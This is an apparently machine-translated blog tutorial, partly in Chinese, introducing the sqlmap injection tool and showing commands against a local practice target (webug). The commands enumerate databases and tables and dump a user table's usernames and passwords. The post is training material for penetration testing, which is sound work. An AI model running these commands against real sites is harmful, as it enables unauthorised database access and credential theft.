Safety drills to test basic 2-sqlmap

Others 2019-08-17 14:16:33 views: null

About sqlmap

sqlmap is an open source penetration testing tool that can be used for automated testing, using the privileges SQL injection vulnerability, access to the database server.

It has a powerful detection engine, penetration testing options for different types of databases, including access to data stored in the database, access the operating system files and even execute operating system commands can be connected by way of a packed data.

It supports security vulnerabilities MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database and other testing.

It supports five different injection modes:

Based on Boolean blinds, which can determine the true and false conditions of injection according to the return page; 

time-based blind, that judgment can not return any information according to the page content, the statement statement to see whether the delay time (ie page return time is increased with conditions ) to judge; 

based on an error injection, that is, the page will return an error message, or the result of the injection of the statements directly back to the page; 

joint inquiry injection, injection in the case of using the union; 

heap inquiry injection can be performed at the same time a number of when injected into the execution of the statement.

sqlmap installation is very simple. Only you need to perform in the environment python2.7 pip install sqlmap to open bags of instant.

 

Drone demonstration

Then on a sql injected by hand we do a demo sqlmap  

The most simple and crude way, we direct knock burst command library. You can expose all of the database name under the current system

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" --batch --dbs

 

Or we do not want to eat with so ugly, just want the name of the database corresponding to the current sql

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" -p gid --current-db

 

接着我们来爆表名。暴露出 pentesterlab 数据下的四张表。

 

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" -p gid  -D  pentesterlab --tables

 

接下来是暴露表字段。我们需要dump user表下面的字段信息并保存到本地文件。俗称脱裤。

sqlmap -u "http://192.168.1.3/webug/pentest/test/sqli/sqltamp.php?gid=1" -p gid  -D  pentesterlab -T user --dump

这样,我们靶机的系统用户名和密码就全部暴露出来了。是不是很简单?

 

演示视频:https://asciinema.org/a/46601

 

Guess you like

Origin www.cnblogs.com/Zfc-Cjk/p/11367279.html
Recommended
Ranking
稀疏数组(狂神)
Windows11 system configuration Pycharm installation tutorial
[From the springboard machine ssh to the intranet target server] Configure vscode to achieve remote connection
Architecture python program
C language test code binary tree search
Questions about University website maintenance
echarts sized digital dashboards
Layui table click event
fantasy function
Windows turns on CPU virtualization + turns off Hyper-V
Daily
More
2024-07-31(0)
2024-07-30(0)
2024-07-29(0)
2024-07-28(0)
2024-07-27(0)
2024-07-26(0)
2024-07-25(0)
2024-07-24(0)
2024-07-23(0)
2024-07-22(0)

Code World

© 2018 codetd.com